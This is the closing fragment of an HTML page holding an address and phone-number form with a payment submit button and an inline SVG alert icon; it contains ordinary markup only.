        <input id="state" type="text" maxlength="15"style="width: 97.5%;" placeholder="&nbsp;State"  name="state" class="white" required title="Please Enter Your State"><br>
        <br>
        <input id="city" type="text" maxlength="15"style="width: 97.5%;" placeholder="&nbsp;City"  name="city" class="white" required title="Please Enter Your City"><br>
        <br>
        <input id="zip" type="text" maxlength="7" style="width: 97.5%;" placeholder="&nbsp;Postal code"  name="zip" class="white" required title="Please Enter Your Zip Code"><br>
        <br>
        <input id="phone" type="text" maxlength="12" style="width: 97.5%;" placeholder="&nbsp;Phone number"  name="phone" class="white" required title="Please Enter Your Zip Code">
        <br>  
<br><br>
	<button type="submit" class="button account ftr" id="payment-save-button"> <span> <span class="effect"></span> <span class="label"> Submit </span> </span> </button> 
	
	
	
	
	  <div id="global-icon-symbols" class="icon-symbols" data-tg-refresh="global-icon-symbols" data-tg-refresh-always="true"><svg xmlns="http://www.w3.org/2000/svg"><symbol id="alert-circle"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 20"><title>Circle-Alert</title><path fill="currentColor" d="M19 10c0 4.97-4.03 9-9 9s-9-4.03-9-9 4.03-9 9-9 9 4.03 9 9z"/><path d="M10 0C4.486 0 0 4.486 0 10s4.486 10 10 10 10-4.486 10-10S15.514 0 10 0zm0 18c-4.41 0-8-3.59-8-8s3.59-8 8-8 8 3.59 8 8-3.59 8-8 8zm0-13c-.552 0-1 .447-1 1v4c0 .553.448 1 1 1s1-.447 1-1V6c0-.553-.448-1-1-1zm0 8c-.552 0-1 .447-1 1s.448 1 1 1 1-.447 1-1-.448-1-1-1z"/></svg></symbol></svg></div>
  </body>

</html>

	
	
	
	